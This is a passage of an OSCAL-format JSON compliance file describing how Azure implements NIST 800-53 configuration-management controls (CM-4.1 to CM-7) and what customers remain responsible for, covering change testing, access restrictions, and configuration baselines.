statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d9013964-0bf5-4b01-8c3c-039603b20016","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4.1","statements":[{"uuid":"a2e4fdc4-ac1c-4b1b-b8bd-c649c03cb31d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4.1_smt","by-components":[{"uuid":"654a3538-e3e1-46ea-b4be-29b0be629891","export":{"provided":[{"uuid":"88a891a2-c976-455d-86e8-df91f1be691b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"}],"description":"The Microsoft Security Development Lifecycle (SDL) process is followed for all engineering and development projects. The SDL process consists of five phases: Requirements, Design, Implementation, Verification and Release. The Requirements phase considers the foundational security, privacy, and cost requirements for a given product. The Design phase is the creation of the plan to implement the product to meet the defined requirements, including risk and threat model analysis. The implementation phase is when security documentation is created for the product, allowing users and customers to make informed decisions on how to deploy it, as well as initial testing to remove any security or privacy issues. The Verification phase is when the implementation is reviewed to ensure that the security and privacy tenets defined in the Requirements phase, and where full product testing takes place. Finally, the Release phase is the creation of incident planning, should any issues regarding the product arise once it is available._x000D_ _x000D_ Each service team tests proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. Azure implements safe deployment known as Safe Deployment Practices (SDP), which includes testing in canary regions and rolling out to increasing percentages of the applicable environment before considering the rollout complete. Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate. If there are any issues during the rollout, the deployment is halted to investigate._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c4f068ff-c95c-4ab0-b7ed-e0cea2b6756c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-031"}],"description":"The customer is responsible for analyzing proposed changes to customer-deployed resources in a test environment before implementation in an operational environment to identify security impacts due to flaws, weaknesses, incompatibility, or intentional malice.","provided-uuid":"88a891a2-c976-455d-86e8-df91f1be691b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a868b012-c821-4205-be8a-1e009fac1d4b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4.2","statements":[{"uuid":"d9e22376-8aeb-44a6-82d7-179dccc88f88","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4.2_smt","by-components":[{"uuid":"7126980a-5a71-4937-9435-61653dabeab7","export":{"provided":[{"uuid":"0e7a830c-123c-4871-b98e-eac370fdb74f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"}],"description":"Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate. If there are any issues during the rollout, the deployment is halted to investigate. Azure also performs periodic audit of the security functions to confirm their operating effectiveness via ASM."}],"responsibilities":[{"uuid":"f0f5f041-c08c-4e04-8f36-b8245f0dde65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-032"}],"description":"The customer is responsible for, after the information system is changed, checking the security functions to verify that the functions are implemented correctly, operating as intended, and producing the desired outcome with regard to meeting the security and privacy requirements for the system.","provided-uuid":"0e7a830c-123c-4871-b98e-eac370fdb74f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c72fb5d4-685c-4c94-9b12-c601edf5d1aa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5","statements":[{"uuid":"a3c367ca-dbf5-49f5-adfc-3f9fa5e64b32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5_smt","by-components":[{"uuid":"c8d6727a-f4b1-4cfe-8c6b-763643656655","export":{"provided":[{"uuid":"2b962600-1692-4bf5-a9ce-70fba5d47eaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"}],"description":"Azure service teams define, document, approve, and enforce logical access restrictions associated with changes by using role-based access control (RBAC) enforced by Active Directory (AD). All accounts created in support of Azure are role-based. Service team personnel request access to, and if approved, are placed in the appropriate security groups according to their roles for supporting the system and using the principles of least privilege._x000D_ _x000D_ Access to the production environment is only allowed to members of specific security groups after approval. A subset of service team personnel has gone through the approval process for read-only access to production, used during critical incident escalations. Segregation of duties is established on critical functions within the Azure production environment, to minimize the risk of unauthorized changes to production systems._x000D_ _x000D_ Access to make changes to the production environment is limited to authorized members in the service teams. Temporary elevated access to the production environment via JIT by other teams may be granted for specific issue handling or troubleshooting purposes._x000D_ _x000D_ To support segregation of duties and prevent unauthorized changes to production, Azure implements segregated environments. Development and testing responsibilities for new software builds or changes to existing software are segregated and managed through restricted access to branches within Azure DevOps and segregated development and test environments. Features and changes are developed by the service teams, reviewed by designated service team members and tested by the service team members for quality assurance and compatibility with the rest of the platform._x000D_ _x000D_ Azure maintains logical and physical separation between the development, test, and production environments. The development, test and production environments run on different clusters in separate network segments. Test and production clusters reside in separate network segments, which are accessed through distinct test and production Jumpboxes, Debug servers, and Network Hop Boxes. Access to test and production Jumpboxes, Debug servers, and Network Hop Boxes is restricted to authorized personnel._x000D_ _x000D_ Transfer of software to the production environment is controlled by a version control system (VCS). Deployment of software bits to production is controlled through approvals and on qualifying production entry criteria. Production deployments use approved software builds and images, and do not contain development tools and utilities. The test data resides in a segregated environment with access restricted to authorized individuals based on job responsibilities. Production data is not used for testing purposes in a way that affects customer service._x000D_ _x000D_ Physical access to servers and network devices is restricted to authorized personnel through the physical access protections in place at the datacenters and Government Cloud Collaboration Centers (GC3s)._x000D_ _x000D_ Privileged Access Workstation (PAW)_x000D_ _x000D_ The Azure environment has additional logical restrictions such as requiring two separate accounts for users who wish to access a PAW and perform administration or implement changes within the environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e0239e39-6ec3-4788-b617-86045631787b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-033"}],"description":"The customer is responsible for enforcing logical access restrictions when making changes to customer-deployed resources.","provided-uuid":"2b962600-1692-4bf5-a9ce-70fba5d47eaf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a093050c-f5ad-496c-ac0f-2d061a264881","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5.1","statements":[{"uuid":"86f966d7-33aa-4e7d-a332-dfffe79907ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.1_smt","by-components":[{"uuid":"f11b470a-87b9-4015-843a-1e9740c5d16b","export":{"provided":[{"uuid":"2458c1a2-3bd6-4f5d-9347-9954ffe59176","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"}],"description":"Servers and Services_x000D_ _x000D_ Service teams use Active Directory (AD) and JIT to control access to change functions. AD defines the access that is available, and JIT provides time-limited permission elevation when users need to use that access. AD and JIT are automated, and actions taken, including account creation, change, disabling, removal for AD and account elevation for JIT, are automatically audited._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Access restrictions are enforced via logical access security group restrictions. AD employs group membership, which requires security group owners to grant access to a given security group. AAA is integrated with a domain taxonomy of groups and users in AD. Both AD and AAA are supported via auditing mechanisms, which are captured via C+AI Security's event collection environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5faf142b-1291-49d5-92b1-31f327bc731b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-034"}],"description":"The customer is responsible for enforcing and auditing the access restrictions defined in CM-05.","provided-uuid":"2458c1a2-3bd6-4f5d-9347-9954ffe59176"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b2c162d9-6068-49b8-908f-77b9ea0b574b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-5.5","statements":[{"uuid":"bea498a8-cc1a-438c-bd87-0189532222f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.5_smt.a","by-components":[{"uuid":"96b57dc7-6c69-4b31-981c-6a3260250a2b","export":{"provided":[{"uuid":"618aecb1-a126-4472-810f-04fe6734f6c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"}],"description":"Azure personnel do not have access to any of the Azure production environments to change hardware, software, or firmware components. Developers and integrators are responsible for developing the code, generating the builds, performing integration testing, and managing deployments. Azure limits privileges to release software and configuration changes to production to authorized personnel; only the designated approvers such as leads, managers, or PMs can approve changes to production, and the service teams deploy the changes using the DevOps model._x000D_ _x000D_ Segregation of duties is established on all critical functions within Azure's production environment, to minimize the risk of unauthorized changes to productions systems. As such, access to make changes to the production environment is limited to authorized service team members using the DevOps model._x000D_ _x000D_ Datacenter Services (DCS) Operations is responsible for managing physical access to the Azure environment. Physical access to the production environment is restricted to DCS personnel, who perform hardware changes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0f215221-a984-4693-aeae-130c7e3e0a7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-035"}],"description":"The customer is responsible for limiting privileges to make changes within customer-deployed production or operational environments.","provided-uuid":"618aecb1-a126-4472-810f-04fe6734f6c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9a83f4ff-3e55-4180-b19d-e99966b1b504","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-5.5_smt.b","by-components":[{"uuid":"9d318409-91dc-4cfc-a0cf-3ebfd61b379f","export":{"provided":[{"uuid":"b7a88236-6e41-4c91-9bcf-77847337fc66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"}],"description":"Azure service teams review access at least quarterly, consistent with normal account review processes. Access to servers and network devices is reviewed for appropriateness on a quarterly basis through review of access levels for physical access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1babde2a-5b47-499f-bfaa-10fbadd0e955","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-036"}],"description":"The customer is responsible for reviewing and reevaluating privileges defined in CM-05(05).a.","provided-uuid":"b7a88236-6e41-4c91-9bcf-77847337fc66"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e09205c3-e9ad-4e3c-ac9c-3c323fea6e18","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6","statements":[{"uuid":"b2054bda-f088-48c4-9f70-0dfaa73ede1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.a","by-components":[{"uuid":"af45c1d1-b0eb-46b9-8051-c819583a75e0","export":{"provided":[{"uuid":"51da7390-d29b-410b-8a21-844008b49689","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"}],"description":"Servers and Secure Admin Workstations (SAWs) Microsoft establishes custom configuration baselines and configuration settings for its server assets. To establish these configuration settings, Microsoft examines and ingests a variety of sources: * Product architecture * Security analysis and principles, such as least functionality, least privilege, authorization and access control, auditing, network security, and operating system hardening * Microsoft Solution Accelerators Security Compliance Manager reference library * Vulnerability library knowledge bases * The United States Government Configuration Baseline USGCB * National Institute of Standards and Technology (NIST) recommendations * National Security Agency (NSA) recommendations * Defense Information Systems Agency (DISA) Security Technical Implementation Guides (STIGs) * Center for Internet Security (CIS) benchmarks Microsoft works closely with CIS, DoD, NIST, and other regulators to establish the configuration settings and works with CIS as a participant during benchmark establishment. The configuration settings are primarily based on the CIS benchmarks and DISA STIGs, modified to address the unique operating environment of Azure. By evaluating and incorporating the best practices, guidance, and testing, Microsoft ensures a secure defense-in-depth deployment of technologies. The industry standards and input from baseline experts across Microsoft along with the environment-specific considerations and some role-specific settings (e.g. domain controller, workgroup server, domain joined server) are used to establish the configuration settings. The baseline for servers is published and made available to Microsoft personnel through the Azure DevOps source code repository, and a copy of the official baseline is published internally to the Liquid requirements catalog that is the authoritative source of requirements authored and maintained by Corporate, External and Legal Affairs (CELA) policy owners as well as other groups across Microsoft. The selected settings reflect the most restrictive, secure mode consistent with operational requirements. Microsoft ensures these settings can be scanned with traditional vulnerability scanners, enabling SCAP compliance on all applicable assets. Network Devices For network devices, Azure Networking defines the approved configuration baselines based on industry best practices and recommendations from the hardware manufacturers, taking into consideration any applicable criteria listed in the Azure details above. These configuration baselines are then established as Gold images from which all network devices are deployed and configured. Network devices are scanned by the vulnerability management tool, which meets SCAP requirements."}],"responsibilities":[{"uuid":"efb7d41f-49d0-479b-bff6-de9b42ceaa1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing and documenting configuration settings for customer-deployed resources that reflect the most restrictive mode consistent with operational requirements.","provided-uuid":"51da7390-d29b-410b-8a21-844008b49689"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ea67f418-9471-4a7f-aae1-36d293dd1f13","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.b","by-components":[{"uuid":"e0098774-da31-4808-b72d-771f607b9b0c","export":{"provided":[{"uuid":"811047cf-dff2-4464-ba86-1d2213c185f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"}],"description":"Servers and Secure Admin Workstations (SAWs) Mandatory configuration settings are implemented on each Azure asset as specified in the corresponding mandatory configuration baseline settings documentation for each component, which are established as described in Part a of this control. Azure service teams use Active Directory Group Policy Objects (GPOs) as an automated mechanism to centrally manage, apply, and verify security configuration settings. For virtual machines that are not domain-joined, Azure uses OS images that already have the appropriate settings configured prior to deployment. Network Devices Using the Gold images, Azure Networking configures all network devices with the required settings prior to deployment. Config Policy Verifier (CPV) compares the current network configuration against the configuration baseline and creates the proposed remediation for any deviations that are required. The results are reviewed and prioritized ongoing with major/critical items receiving priority remediation."}],"responsibilities":[{"uuid":"a33f67f6-8723-4b20-bf59-8c0ca46b326f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing the configuration settings defined in CM-06.a.","provided-uuid":"811047cf-dff2-4464-ba86-1d2213c185f0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e862107-dcc0-4b1c-9729-877435a945ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.c","by-components":[{"uuid":"3bf2cc83-e166-4667-a6e2-03f818f096c5","export":{"provided":[{"uuid":"00439f2d-5f43-4c3e-aecf-075ee3345b56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"}],"description":"Servers and Secure Admin Workstations (SAWs) There are currently no exceptions to the mandatory configuration settings in Azure, as all Azure components are running one of the approved builds. In the case of an exception, the exception is documented through the One Compliance System (1CS) exception process. If there is a need to deviate from the standard configuration settings, the Azure System Owner is required to approve the documented operational necessity for this deviation. All configuration changes are limited to the specific service team members responsible for the component and are captured as part of the workflow for the change management process defined in the Azure change process. Network Devices Exceptions may be discovered that requires temporary deviation from the mandatory configuration settings to avoid impacting production services while the issue is resolved. In these situations, Azure Networking takes the following actions: * The issue is triaged and discussed by Azure Networking Operations, and Azure Networking Engineering (including Azure Networking management) and a course of action is agreed upon and approved by this group. * The issue is discussed in the daily Azure Networking Operations meeting for general awareness. * The relevant policy in Config Policy Verifier (CPV) is temporarily altered. * The issue is fixed. As an example, this might involve deploying a new code revision to the affected devices. * The relevant policy in CPV is restored, and the configuration testing against the baseline resumes as usual. ACL Configuration Changes Security reviews are used by Azure and business groups to assess the security risks associated with non-standard operational implementations. Changes not expressly allowed by the Firewall and Tiered ACL guidelines (e.g. when an Azure team requests a non-standard change to configuration settings) are not allowed to be made to the Azure system's current configuration without a completed review. Alternative to a quarterly review cycle, Azure performs these reviews real-time, prior to the implementation of the non-standard change (Configuration changes that are not automatically approved within the Firewall and Tiered ACL Guidelines). To request a review, the requesting Azure team must populate a questionnaire, providing descriptions of the request, requirements, and justification for the change. Depending on the asset classification of data, descriptions may include data types, current compliance with data handling, and any risk assessment or threat analysis the Azure team has conducted in coordination with Privacy, CELA, or C+AI Security. The Azure team must also provide documentation to help the team that reviews (C+AI Security Solutions) assess operational risks (e.g. architecture and network diagrams, infrastructure threat models, etc.)."}],"responsibilities":[{"uuid":"6885330d-b6e9-48c8-b0ad-1b8d9b0689ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying, documenting, and approving any deviations from established configuration settings for customer-deployed resources.","provided-uuid":"00439f2d-5f43-4c3e-aecf-075ee3345b56"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"41196027-6a29-4907-ae6e-845cad78f70d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6_smt.d","by-components":[{"uuid":"a8d9c2c9-f88b-4efc-84c5-79a5fd1b6ad3","export":{"provided":[{"uuid":"1e7bfff9-bafd-4c7f-932e-2ca307d33ea3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"}],"description":"Servers and Secure Admin Workstations (SAWs) All configuration changes are limited to the specific personnel responsible for the component and are captured in audit logs. In addition, vulnerability scans are run to assist in determining the effectiveness of the configuration settings on the applications and servers. Only certain individuals have the privileges to make changes to the configuration of the system based on an approved access model that requires establishing business justification for the membership. If an unauthorized person attempts to make changes, the system automatically denies the request. The action is captured in the audit logs and is investigated. If further actions are required, it is reported up to Azure and service team incident management personnel are notified immediately. The audit logs are maintained in storage for at least ninety (90) days to support after-the-fact investigations. Installed software is monitored using Azure Security Monitoring (ASM) and SCUBA. If unauthorized software installation is detected, the Security Response Team responds. Network Devices Configuration baselines for network devices are incorporated as policies in Config Policy Verifier (CPV), which performs ongoing checks of all devices deployed on the network and reports deviations from standards. Upon discovering a deviation from the baseline, devices are corrected to ensure they agree with the current baseline."}],"responsibilities":[{"uuid":"ae90727c-3bca-40cd-9cd1-9bfe1da77d95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring and controlling changes to the configuration settings in accordance with organization policies and procedures.","provided-uuid":"1e7bfff9-bafd-4c7f-932e-2ca307d33ea3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f0579771-eca1-4c85-8fe4-21bba58bc15e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6.1","statements":[{"uuid":"ca24e2cd-ca25-481f-bbf9-ca5c7b45d915","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6.1_smt","by-components":[{"uuid":"46e6e745-09c7-40a3-bad5-7611911e9788","export":{"provided":[{"uuid":"d8655e87-0a41-41b0-9024-ef3742de6192","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"}],"description":"Azure teams employ several tools to automatically manage, apply and verify configurations settings._x000D_ _x000D_ Servers_x000D_ _x000D_ # IPAK_x000D_ _x000D_ The services running on Bare Metal and Pilotfish servers, including, but not limited to, Jumpboxes, Active Directory, Azure DNS, and other service teams, run standard Windows Server. The configuration baseline image for these assets is provided by the Imaging Production (IPAK) Engineering Team. The IPAK tool automates the installation of a standard set of applications, security fixes, and performance enhancements on Azure servers by providing a predictable and secure configuration in alignment with the Azure server baselines. Configuration baselines are developed by C+AI Security and then integrated into the IPAK for application to Azure servers. The IPAK is fully automatable or can be run manually, either locally on a single server, or remotely against many servers. The deployment of an IPAK includes the ability to access the summary log and preview status before and after an IPAK is deployed. IPAK logs are collected and can be previewed within the log collector tool, located on the IPAK site. This tool centrally manages and allows querying of log data for IPAK deployments._x000D_ _x000D_ # RDOS_x000D_ _x000D_ The RDOS team updates the server configuration baseline for Azure Host, Azure Native, and Azure Guest assets. The server base image is a version in which the kernel and many other core components have been modified to optimize them for the Azure environment. For service teams using Cloud Services, Windows server images are in the form of Virtual Hard Disks (VHDs) that are deployed as Guest VMs in the production environment. For Linux images, service teams use the Secure Base Image (SBI) that has been customized for secure configuration baselines relevant to Azure._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Config Policy Verifier (CPV) centrally monitors network device configurations, including verification of configuration settings and application and management of them. Device configuration settings are compared against network device baselines in the form of Gold images to determine consistency across the environment._x000D_ _x000D_ The Configuration Management process runs daily on all Azure network devices, verifying the device configuration against Azure Networking standard policies. The Summary report notes the number of failures and the number of devices tested._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a8f28981-90c3-4d8e-953b-feef0cceefd6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-041"}],"description":"The customer is responsible for employing automated mechanisms to centrally manage, apply, and verify configuration settings for customer-deployed resources.","provided-uuid":"d8655e87-0a41-41b0-9024-ef3742de6192"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7c78a782-9828-4b8a-8fcd-b1e524045585","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-6.2","statements":[{"uuid":"577ff8e5-5fb9-4f88-b9bb-c3e0f327b980","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-6.2_smt","by-components":[{"uuid":"d1a311df-8881-46b4-a831-9e7560f78d23","export":{"provided":[{"uuid":"6e172955-deb0-400b-90a9-58fa56e6c648","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"}],"description":"Azure Security has developed a set of auditable events specific to Azure. In the event of changes to security-relevant configuration settings, Azure Security invokes the incident management process._x000D_ _x000D_ In addition to auditable events, Azure utilizes Azure Security Monitoring (ASM) which is SCAP compatible to scan the environment for mandatory configuration changes. In the event of unauthorized changes to security-relevant configuration settings, Azure Security would invoke the incident management process. Each service team has a rotating list of members that are on call for response team efforts to investigate any unauthorized changes to security settings._x000D_ _x000D_"}],"responsibilities":[{"uuid":"226e0614-644a-4f5a-a077-5d44a1d5d884","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-042"}],"description":"The customer is responsible for employing security safeguards to respond to unauthorized changes to configuration settings for customer-deployed resources.","provided-uuid":"6e172955-deb0-400b-90a9-58fa56e6c648"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a98f0ea7-7623-4cb0-9eb8-56c5c80874b3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7","statements":[{"uuid":"17e67bc9-53cc-48d7-aacc-b18561cda0e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7_smt.a","by-components":[{"uuid":"cd2530aa-2814-4513-8a37-c4b4e347570c","export":{"provided":[{"uuid":"983b3390-05be-4458-a0b7-43ee602037a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"}],"description":"Azure takes into consideration the USGCB, DISA STIGs, CIS Benchmarks, vendor recommendations, and internal research in development of all operating system images, configuration scripts, and configuration files deployed within the system. These baselines help to ensure that only essential functions, ports, protocols, and services are enabled for each server. For network devices, the Azure Networking Standards and Architecture team sets the ACLs and configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor. These configuration baselines help to ensure that only 